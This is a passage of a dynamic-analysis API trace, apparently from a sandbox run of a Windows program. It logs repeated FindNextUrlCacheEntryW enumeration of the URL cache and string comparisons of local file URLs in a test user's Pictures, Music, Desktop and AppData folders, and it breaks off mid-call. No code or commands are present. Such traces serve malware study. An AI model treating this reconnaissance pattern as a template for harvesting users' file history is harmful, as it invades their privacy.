(_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/laxv.gif", _String2="file:///C:/Users/CIiHmnxMn6Ps/Desktop/oAZoBv-GDm/ZdQ%20Yjy.m4a") returned 1 [0067.293] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/laxv.gif", _String2="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/CF59qvHy72f0q.mp3") returned 1 [0067.293] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/laxv.gif", _String2="file:///C:/Users/CIiHmnxMn6Ps/Music/MBfffFZaRO85qN2y7/tW6w.m4a") returned 1 [0067.294] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/laxv.gif", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/kbaJl3vP3jeAWydRPj/27QyANvwCf-Uw/81P7puIlOgX.jpg") returned 1 [0067.294] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/laxv.gif", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/pkrrVSCVV%20wDa1wJ/5-kbYj32q24z/fxz4eUE2J3.jpg") returned -1 [0067.294] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/laxv.gif", _String2="file:///C:/Users/CIiHmnxMn6Ps/Music/MBfffFZaRO85qN2y7/emg2isSn89KH1rCqnkVE.mp3") returned 1 [0067.294] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/laxv.gif", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH") returned 1 [0067.294] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/laxv.gif", _String2="file:///C:/Users/CIiHmnxMn6Ps/Videos/_4zPQ5H6/5Phl/d4uaT.flv") returned -1 [0067.294] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/laxv.gif") returned 0x36 [0067.294] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.294] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Desktop/p72mwNsoaskX8JFjLk6c.wav", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/laxv.gif") returned -1 [0067.294] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Desktop/p72mwNsoaskX8JFjLk6c.wav", _String2="file:///C:/Users/CIiHmnxMn6Ps/Music/cZp7-eTNxLNDQFn/k3vwoO771R7ylvuEX3.m4a") returned -1 [0067.294] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Desktop/p72mwNsoaskX8JFjLk6c.wav", _String2="file:///C:/Users/CIiHmnxMn6Ps/Desktop/oAZoBv-GDm/eEYb71dCI6e0acGlSYj.mp3") returned 1 [0067.294] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Desktop/p72mwNsoaskX8JFjLk6c.wav", _String2="file:///C:/Users/CIiHmnxMn6Ps/Desktop/rH4AI2hPInY%20i8W-HJ_.jpg") returned -1 [0067.294] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Desktop/p72mwNsoaskX8JFjLk6c.wav", _String2="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw") returned -1 [0067.294] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Desktop/p72mwNsoaskX8JFjLk6c.wav", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/XAolOZ/q4-FpJ4h2n7/vBOyKHAuavu.gif") returned -1 [0067.294] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Desktop/p72mwNsoaskX8JFjLk6c.wav", _String2="file:///C:/Users/CIiHmnxMn6Ps/Documents/d6QuM4BrMJV.csv") returned -1 [0067.294] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Desktop/p72mwNsoaskX8JFjLk6c.wav", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/pkrrVSCVV%20wDa1wJ") returned -1 [0067.294] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Desktop/p72mwNsoaskX8JFjLk6c.wav", _String2="file:///C:/Users/CIiHmnxMn6Ps/Desktop/oAZoBv-GDm/ZdQ%20Yjy.m4a") returned 1 [0067.294] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Desktop/p72mwNsoaskX8JFjLk6c.wav", _String2="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/CF59qvHy72f0q.mp3") returned 1 [0067.294] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Desktop/p72mwNsoaskX8JFjLk6c.wav", _String2="file:///C:/Users/CIiHmnxMn6Ps/Music/MBfffFZaRO85qN2y7/tW6w.m4a") returned -1 [0067.294] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Desktop/p72mwNsoaskX8JFjLk6c.wav", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/kbaJl3vP3jeAWydRPj/27QyANvwCf-Uw/81P7puIlOgX.jpg") returned -1 [0067.294] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Desktop/p72mwNsoaskX8JFjLk6c.wav", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/pkrrVSCVV%20wDa1wJ/5-kbYj32q24z/fxz4eUE2J3.jpg") returned -1 [0067.294] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Desktop/p72mwNsoaskX8JFjLk6c.wav", _String2="file:///C:/Users/CIiHmnxMn6Ps/Music/MBfffFZaRO85qN2y7/emg2isSn89KH1rCqnkVE.mp3") returned -1 [0067.294] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Desktop/p72mwNsoaskX8JFjLk6c.wav", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH") returned -1 [0067.294] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Desktop/p72mwNsoaskX8JFjLk6c.wav", _String2="file:///C:/Users/CIiHmnxMn6Ps/Videos/_4zPQ5H6/5Phl/d4uaT.flv") returned -1 [0067.294] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Desktop/p72mwNsoaskX8JFjLk6c.wav") returned 0x3e [0067.294] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.294] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Desktop/EY-85l4ZHmyKzZn.docx", _String2="file:///C:/Users/CIiHmnxMn6Ps/Desktop/p72mwNsoaskX8JFjLk6c.wav") returned -1 [0067.294] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Desktop/EY-85l4ZHmyKzZn.docx", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/laxv.gif") returned -1 [0067.294] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Desktop/EY-85l4ZHmyKzZn.docx", _String2="file:///C:/Users/CIiHmnxMn6Ps/Music/cZp7-eTNxLNDQFn/k3vwoO771R7ylvuEX3.m4a") returned -1 [0067.294] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Desktop/EY-85l4ZHmyKzZn.docx", _String2="file:///C:/Users/CIiHmnxMn6Ps/Desktop/oAZoBv-GDm/eEYb71dCI6e0acGlSYj.mp3") returned -1 [0067.294] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Desktop/EY-85l4ZHmyKzZn.docx", _String2="file:///C:/Users/CIiHmnxMn6Ps/Desktop/rH4AI2hPInY%20i8W-HJ_.jpg") returned -1 [0067.294] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Desktop/EY-85l4ZHmyKzZn.docx", _String2="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw") returned -1 [0067.294] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Desktop/EY-85l4ZHmyKzZn.docx", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/XAolOZ/q4-FpJ4h2n7/vBOyKHAuavu.gif") returned -1 [0067.294] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Desktop/EY-85l4ZHmyKzZn.docx", _String2="file:///C:/Users/CIiHmnxMn6Ps/Documents/d6QuM4BrMJV.csv") returned -1 [0067.294] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Desktop/EY-85l4ZHmyKzZn.docx", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/pkrrVSCVV%20wDa1wJ") returned -1 [0067.294] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Desktop/EY-85l4ZHmyKzZn.docx", _String2="file:///C:/Users/CIiHmnxMn6Ps/Desktop/oAZoBv-GDm/ZdQ%20Yjy.m4a") returned -1 [0067.294] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Desktop/EY-85l4ZHmyKzZn.docx", _String2="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/CF59qvHy72f0q.mp3") returned 1 [0067.294] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Desktop/EY-85l4ZHmyKzZn.docx", _String2="file:///C:/Users/CIiHmnxMn6Ps/Music/MBfffFZaRO85qN2y7/tW6w.m4a") returned -1 [0067.294] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Desktop/EY-85l4ZHmyKzZn.docx", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/kbaJl3vP3jeAWydRPj/27QyANvwCf-Uw/81P7puIlOgX.jpg") returned -1 [0067.294] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Desktop/EY-85l4ZHmyKzZn.docx", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/pkrrVSCVV%20wDa1wJ/5-kbYj32q24z/fxz4eUE2J3.jpg") returned -1 [0067.294] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Desktop/EY-85l4ZHmyKzZn.docx", _String2="file:///C:/Users/CIiHmnxMn6Ps/Music/MBfffFZaRO85qN2y7/emg2isSn89KH1rCqnkVE.mp3") returned -1 [0067.294] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Desktop/EY-85l4ZHmyKzZn.docx", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH") returned -1 [0067.294] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Desktop/EY-85l4ZHmyKzZn.docx", _String2="file:///C:/Users/CIiHmnxMn6Ps/Videos/_4zPQ5H6/5Phl/d4uaT.flv") returned -1 [0067.294] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Desktop/EY-85l4ZHmyKzZn.docx") returned 0x3a [0067.294] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.295] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw/Zxr1UNIGqisvCNnn/jhDw-E/l_AsyXf/ryzcO9uW5%20na%20NkIn.m4a", _String2="file:///C:/Users/CIiHmnxMn6Ps/Desktop/EY-85l4ZHmyKzZn.docx") returned 1 [0067.295] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw/Zxr1UNIGqisvCNnn/jhDw-E/l_AsyXf/ryzcO9uW5%20na%20NkIn.m4a", _String2="file:///C:/Users/CIiHmnxMn6Ps/Desktop/p72mwNsoaskX8JFjLk6c.wav") returned 1 [0067.295] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw/Zxr1UNIGqisvCNnn/jhDw-E/l_AsyXf/ryzcO9uW5%20na%20NkIn.m4a", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/laxv.gif") returned -1 [0067.295] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw/Zxr1UNIGqisvCNnn/jhDw-E/l_AsyXf/ryzcO9uW5%20na%20NkIn.m4a", _String2="file:///C:/Users/CIiHmnxMn6Ps/Music/cZp7-eTNxLNDQFn/k3vwoO771R7ylvuEX3.m4a") returned 1 [0067.295] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw/Zxr1UNIGqisvCNnn/jhDw-E/l_AsyXf/ryzcO9uW5%20na%20NkIn.m4a", _String2="file:///C:/Users/CIiHmnxMn6Ps/Desktop/oAZoBv-GDm/eEYb71dCI6e0acGlSYj.mp3") returned 1 [0067.295] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw/Zxr1UNIGqisvCNnn/jhDw-E/l_AsyXf/ryzcO9uW5%20na%20NkIn.m4a", _String2="file:///C:/Users/CIiHmnxMn6Ps/Desktop/rH4AI2hPInY%20i8W-HJ_.jpg") returned 1 [0067.295] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw/Zxr1UNIGqisvCNnn/jhDw-E/l_AsyXf/ryzcO9uW5%20na%20NkIn.m4a", _String2="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw") returned 1 [0067.295] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw/Zxr1UNIGqisvCNnn/jhDw-E/l_AsyXf/ryzcO9uW5%20na%20NkIn.m4a", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/XAolOZ/q4-FpJ4h2n7/vBOyKHAuavu.gif") returned -1 [0067.295] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw/Zxr1UNIGqisvCNnn/jhDw-E/l_AsyXf/ryzcO9uW5%20na%20NkIn.m4a", _String2="file:///C:/Users/CIiHmnxMn6Ps/Documents/d6QuM4BrMJV.csv") returned 1 [0067.295] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw/Zxr1UNIGqisvCNnn/jhDw-E/l_AsyXf/ryzcO9uW5%20na%20NkIn.m4a", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/pkrrVSCVV%20wDa1wJ") returned -1 [0067.295] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw/Zxr1UNIGqisvCNnn/jhDw-E/l_AsyXf/ryzcO9uW5%20na%20NkIn.m4a", _String2="file:///C:/Users/CIiHmnxMn6Ps/Desktop/oAZoBv-GDm/ZdQ%20Yjy.m4a") returned 1 [0067.295] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw/Zxr1UNIGqisvCNnn/jhDw-E/l_AsyXf/ryzcO9uW5%20na%20NkIn.m4a", _String2="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/CF59qvHy72f0q.mp3") returned 1 [0067.295] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw/Zxr1UNIGqisvCNnn/jhDw-E/l_AsyXf/ryzcO9uW5%20na%20NkIn.m4a", _String2="file:///C:/Users/CIiHmnxMn6Ps/Music/MBfffFZaRO85qN2y7/tW6w.m4a") returned 1 [0067.295] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw/Zxr1UNIGqisvCNnn/jhDw-E/l_AsyXf/ryzcO9uW5%20na%20NkIn.m4a", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/kbaJl3vP3jeAWydRPj/27QyANvwCf-Uw/81P7puIlOgX.jpg") returned -1 [0067.295] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw/Zxr1UNIGqisvCNnn/jhDw-E/l_AsyXf/ryzcO9uW5%20na%20NkIn.m4a", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/pkrrVSCVV%20wDa1wJ/5-kbYj32q24z/fxz4eUE2J3.jpg") returned -1 [0067.295] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw/Zxr1UNIGqisvCNnn/jhDw-E/l_AsyXf/ryzcO9uW5%20na%20NkIn.m4a", _String2="file:///C:/Users/CIiHmnxMn6Ps/Music/MBfffFZaRO85qN2y7/emg2isSn89KH1rCqnkVE.mp3") returned 1 [0067.295] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw/Zxr1UNIGqisvCNnn/jhDw-E/l_AsyXf/ryzcO9uW5%20na%20NkIn.m4a", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH") returned -1 [0067.295] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw/Zxr1UNIGqisvCNnn/jhDw-E/l_AsyXf/ryzcO9uW5%20na%20NkIn.m4a", _String2="file:///C:/Users/CIiHmnxMn6Ps/Videos/_4zPQ5H6/5Phl/d4uaT.flv") returned -1 [0067.295] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw/Zxr1UNIGqisvCNnn/jhDw-E/l_AsyXf/ryzcO9uW5%20na%20NkIn.m4a") returned 0x74 [0067.295] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.295] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/NtipEAj_UPk8oLcHaMk.m4a", _String2="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw/Zxr1UNIGqisvCNnn/jhDw-E/l_AsyXf/ryzcO9uW5%20na%20NkIn.m4a") returned -1 [0067.295] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/NtipEAj_UPk8oLcHaMk.m4a", _String2="file:///C:/Users/CIiHmnxMn6Ps/Desktop/EY-85l4ZHmyKzZn.docx") returned -1 [0067.295] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/NtipEAj_UPk8oLcHaMk.m4a", _String2="file:///C:/Users/CIiHmnxMn6Ps/Desktop/p72mwNsoaskX8JFjLk6c.wav") returned -1 [0067.295] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/NtipEAj_UPk8oLcHaMk.m4a", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/laxv.gif") returned -1 [0067.295] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/NtipEAj_UPk8oLcHaMk.m4a", _String2="file:///C:/Users/CIiHmnxMn6Ps/Music/cZp7-eTNxLNDQFn/k3vwoO771R7ylvuEX3.m4a") returned -1 [0067.295] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/NtipEAj_UPk8oLcHaMk.m4a", _String2="file:///C:/Users/CIiHmnxMn6Ps/Desktop/oAZoBv-GDm/eEYb71dCI6e0acGlSYj.mp3") returned -1 [0067.295] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/NtipEAj_UPk8oLcHaMk.m4a", _String2="file:///C:/Users/CIiHmnxMn6Ps/Desktop/rH4AI2hPInY%20i8W-HJ_.jpg") returned -1 [0067.295] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/NtipEAj_UPk8oLcHaMk.m4a", _String2="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw") returned -1 [0067.295] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/NtipEAj_UPk8oLcHaMk.m4a", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/XAolOZ/q4-FpJ4h2n7/vBOyKHAuavu.gif") returned -1 [0067.295] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/NtipEAj_UPk8oLcHaMk.m4a", _String2="file:///C:/Users/CIiHmnxMn6Ps/Documents/d6QuM4BrMJV.csv") returned -1 [0067.295] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/NtipEAj_UPk8oLcHaMk.m4a", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/pkrrVSCVV%20wDa1wJ") returned -1 [0067.295] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/NtipEAj_UPk8oLcHaMk.m4a", _String2="file:///C:/Users/CIiHmnxMn6Ps/Desktop/oAZoBv-GDm/ZdQ%20Yjy.m4a") returned -1 [0067.295] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/NtipEAj_UPk8oLcHaMk.m4a", _String2="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/CF59qvHy72f0q.mp3") returned 1 [0067.295] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/NtipEAj_UPk8oLcHaMk.m4a", _String2="file:///C:/Users/CIiHmnxMn6Ps/Music/MBfffFZaRO85qN2y7/tW6w.m4a") returned -1 [0067.295] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/NtipEAj_UPk8oLcHaMk.m4a", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/kbaJl3vP3jeAWydRPj/27QyANvwCf-Uw/81P7puIlOgX.jpg") returned -1 [0067.295] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/NtipEAj_UPk8oLcHaMk.m4a", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/pkrrVSCVV%20wDa1wJ/5-kbYj32q24z/fxz4eUE2J3.jpg") returned -1 [0067.295] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/NtipEAj_UPk8oLcHaMk.m4a", _String2="file:///C:/Users/CIiHmnxMn6Ps/Music/MBfffFZaRO85qN2y7/emg2isSn89KH1rCqnkVE.mp3") returned -1 [0067.295] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/NtipEAj_UPk8oLcHaMk.m4a", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH") returned -1 [0067.295] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/NtipEAj_UPk8oLcHaMk.m4a", _String2="file:///C:/Users/CIiHmnxMn6Ps/Videos/_4zPQ5H6/5Phl/d4uaT.flv") returned -1 [0067.295] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/NtipEAj_UPk8oLcHaMk.m4a") returned 0x45 [0067.295] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.295] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH/gT8kPO", _String2="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/NtipEAj_UPk8oLcHaMk.m4a") returned 1 [0067.295] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH/gT8kPO", _String2="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw/Zxr1UNIGqisvCNnn/jhDw-E/l_AsyXf/ryzcO9uW5%20na%20NkIn.m4a") returned 1 [0067.295] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH/gT8kPO", _String2="file:///C:/Users/CIiHmnxMn6Ps/Desktop/EY-85l4ZHmyKzZn.docx") returned 1 [0067.295] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH/gT8kPO", _String2="file:///C:/Users/CIiHmnxMn6Ps/Desktop/p72mwNsoaskX8JFjLk6c.wav") returned 1 [0067.295] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH/gT8kPO", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/laxv.gif") returned -1 [0067.296] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH/gT8kPO", _String2="file:///C:/Users/CIiHmnxMn6Ps/Music/cZp7-eTNxLNDQFn/k3vwoO771R7ylvuEX3.m4a") returned 1 [0067.296] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH/gT8kPO", _String2="file:///C:/Users/CIiHmnxMn6Ps/Desktop/oAZoBv-GDm/eEYb71dCI6e0acGlSYj.mp3") returned 1 [0067.296] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH/gT8kPO", _String2="file:///C:/Users/CIiHmnxMn6Ps/Desktop/rH4AI2hPInY%20i8W-HJ_.jpg") returned 1 [0067.296] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH/gT8kPO", _String2="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw") returned 1 [0067.296] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH/gT8kPO", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/XAolOZ/q4-FpJ4h2n7/vBOyKHAuavu.gif") returned -1 [0067.296] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH/gT8kPO", _String2="file:///C:/Users/CIiHmnxMn6Ps/Documents/d6QuM4BrMJV.csv") returned 1 [0067.296] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH/gT8kPO", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/pkrrVSCVV%20wDa1wJ") returned -1 [0067.296] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH/gT8kPO", _String2="file:///C:/Users/CIiHmnxMn6Ps/Desktop/oAZoBv-GDm/ZdQ%20Yjy.m4a") returned 1 [0067.296] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH/gT8kPO", _String2="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/CF59qvHy72f0q.mp3") returned 1 [0067.296] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH/gT8kPO", _String2="file:///C:/Users/CIiHmnxMn6Ps/Music/MBfffFZaRO85qN2y7/tW6w.m4a") returned 1 [0067.296] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH/gT8kPO", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/kbaJl3vP3jeAWydRPj/27QyANvwCf-Uw/81P7puIlOgX.jpg") returned -1 [0067.296] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH/gT8kPO", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/pkrrVSCVV%20wDa1wJ/5-kbYj32q24z/fxz4eUE2J3.jpg") returned -1 [0067.296] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH/gT8kPO", _String2="file:///C:/Users/CIiHmnxMn6Ps/Music/MBfffFZaRO85qN2y7/emg2isSn89KH1rCqnkVE.mp3") returned 1 [0067.296] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH/gT8kPO", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH") returned 1 [0067.296] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH/gT8kPO", _String2="file:///C:/Users/CIiHmnxMn6Ps/Videos/_4zPQ5H6/5Phl/d4uaT.flv") returned -1 [0067.296] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH/gT8kPO") returned 0x3f [0067.296] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, 